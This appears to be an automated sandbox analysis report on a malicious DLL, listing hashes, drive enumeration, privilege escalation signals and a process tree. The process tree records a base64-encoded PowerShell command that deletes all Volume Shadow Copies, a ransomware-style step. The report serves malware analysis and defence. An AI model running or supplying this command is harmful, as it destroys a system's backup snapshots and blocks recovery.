Analysis
-
max time kernel
120s -
max time network
136s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:53
Static task
static1
Behavioral task
behavioral1
Sample
dc6539e553d578eef069fcebd0743c958eb5e0d2cf0cb74cbfb9b63954d0b532.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
dc6539e553d578eef069fcebd0743c958eb5e0d2cf0cb74cbfb9b63954d0b532.dll
Resource
win10-en-20211208
General
-
Target
dc6539e553d578eef069fcebd0743c958eb5e0d2cf0cb74cbfb9b63954d0b532.dll
-
Size
164KB
-
MD5
18c865a19580f48110fc2e8ae697e6bd
-
SHA1
90fc85cd1eab5168572aa6606a6c90999ee0deea
-
SHA256
dc6539e553d578eef069fcebd0743c958eb5e0d2cf0cb74cbfb9b63954d0b532
-
SHA512
aace17fd430c0cd8256489bf550b09dbd1281933896e5301eb9a094b82e6062c1417894928ce4c68503db85aa24803e743fbf9d321e936ad8d41a793392696f0
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\W: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 944 rundll32.exe 1404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 944 rundll32.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeBackupPrivilege 1296 vssvc.exe Token: SeRestorePrivilege 1296 vssvc.exe Token: SeAuditPrivilege 1296 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1616 wrote to memory of 944 1616 rundll32.exe rundll32.exe PID 1616 wrote to memory of 944 1616 rundll32.exe rundll32.exe PID 1616 wrote to memory of 944 1616 rundll32.exe rundll32.exe PID 1616 wrote to memory of 944 1616 rundll32.exe rundll32.exe PID 1616 wrote to memory of 944 1616 rundll32.exe rundll32.exe PID 1616 wrote to memory of 944 1616 rundll32.exe rundll32.exe PID 1616 wrote to memory of 944 1616 rundll32.exe rundll32.exe PID 944 wrote to memory of 1404 944 rundll32.exe powershell.exe PID 944 wrote to memory of 1404 944 rundll32.exe powershell.exe PID 944 wrote to memory of 1404 944 rundll32.exe powershell.exe PID 944 wrote to memory of 1404 944 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\dc6539e553d578eef069fcebd0743c958eb5e0d2cf0cb74cbfb9b63954d0b532.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\dc6539e553d578eef069fcebd0743c958eb5e0d2cf0cb74cbfb9b63954d0b532.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:808
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1296
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/944-55-0x0000000076921000-0x0000000076923000-memory.dmpFilesize
8KB
-
memory/1404-56-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmpFilesize
8KB
-
memory/1404-57-0x000007FEF3510000-0x000007FEF406D000-memory.dmpFilesize
11.4MB
-
memory/1404-58-0x0000000002410000-0x0000000002490000-memory.dmpFilesize
512KB
-
memory/1404-60-0x0000000002410000-0x0000000002490000-memory.dmpFilesize
512KB
-
memory/1404-59-0x0000000002410000-0x0000000002490000-memory.dmpFilesize
512KB
-
memory/1404-61-0x0000000002410000-0x0000000002490000-memory.dmpFilesize
512KB